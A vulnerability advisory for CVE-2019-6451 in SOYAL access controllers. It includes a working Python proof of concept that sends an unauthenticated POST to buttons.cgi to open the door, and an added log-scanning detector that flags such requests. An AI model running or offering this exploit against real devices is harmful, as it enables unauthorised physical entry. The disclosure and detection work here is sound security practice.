CVE-2019-6451
Timeline
- January 15, 2019 reported to SOYAL
- January 15, 2019 arranged meeting time for further discussions
- January 16, 2019 CVE assigned
Affected Products
- SOYAL-AR727H
- SOYAL-AR829Ev5
Technical Details
On these devices, all CGI programs allow unauthenticated POST access.
Anyone who knows the proper parameters and format can make them work,
for example to open the door or insert a new account on the device.
In the Direct Control tab, you can control the door directly.
Replay the request with Burp Suite or send it with the Python code below:
import requests

# IP is a placeholder for the device address.
response = requests.post('http://IP/buttons.cgi', data={
    'btn_Node': '255',
    'btnOpenAllPulse': '+Action+',
    'btn_nameDI0': 'DI0',
    'btn_nameDI1': 'DI1',
    'btn_nameDI2': 'DI2',
    'btn_nameDI3': 'DI3',
    'btn_nameDO0': 'RelayOutput0',
    'delayDO0': '0',
    'btn_nameDO1': 'DO1',
    'delayDO1': '0',
    'btn_nameDO2': 'DO2',
    'delayDO2': '0',
    'btn_nameDO3': 'DO3',
    'delayDO3': '0',
})

OPEN SESAME !!!
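For defenders, an added example (not part of the original advisory) that scans HTTP request logs from a proxy or IDS placed in front of the controller and flags POSTs to its CGI programs that come from outside the management network or carry no credentials. The log format, the `ADMIN_NETS` range, the credentials column and the `/example.cgi` path are assumptions made for illustration; only `buttons.cgi` and `btnOpenAllPulse` come from the request above.

```python
import ipaddress
from urllib.parse import parse_qs

# Assumption: only these networks should ever reach the controller's web UI.
ADMIN_NETS = [ipaddress.ip_network("10.20.0.0/28")]

# Constructed sample log lines (not from a real device). Assumed format:
# source-ip method path credentials-presented(yes/no) urlencoded-body
# /example.cgi is a hypothetical path standing in for any other CGI program.
SAMPLE_LOG = """\
10.20.0.5 POST /buttons.cgi yes btn_Node=255&btnOpenAllPulse=%2BAction%2B
192.0.2.44 POST /buttons.cgi no btn_Node=255&btnOpenAllPulse=%2BAction%2B&delayDO0=0
192.0.2.44 GET /index.htm no -
10.20.0.7 POST /example.cgi no name=test
"""

def analyse(log_text):
    """Return (source, path, reasons) for each suspicious CGI POST."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split(maxsplit=4)
        if len(parts) != 5:
            continue  # skip malformed lines
        src, method, path, creds, body = parts
        if method != "POST" or not path.lower().endswith(".cgi"):
            continue
        try:
            addr = ipaddress.ip_address(src)
        except ValueError:
            continue  # source field is not an IP address
        reasons = []
        if not any(addr in net for net in ADMIN_NETS):
            reasons.append("source-outside-admin-net")
        if creds != "yes":
            reasons.append("no-credentials")
        if not reasons:
            continue  # authenticated request from the management network
        # Annotate the door-control request described in the advisory.
        fields = parse_qs(body, keep_blank_values=True)
        if path == "/buttons.cgi" and "btnOpenAllPulse" in fields:
            reasons.append("door-open-command")
        findings.append((src, path, reasons))
    return findings

if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(finding)
```

Because the devices accept these POSTs without authentication, the same source list is a natural basis for a network ACL that limits access to the web interface to management hosts.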

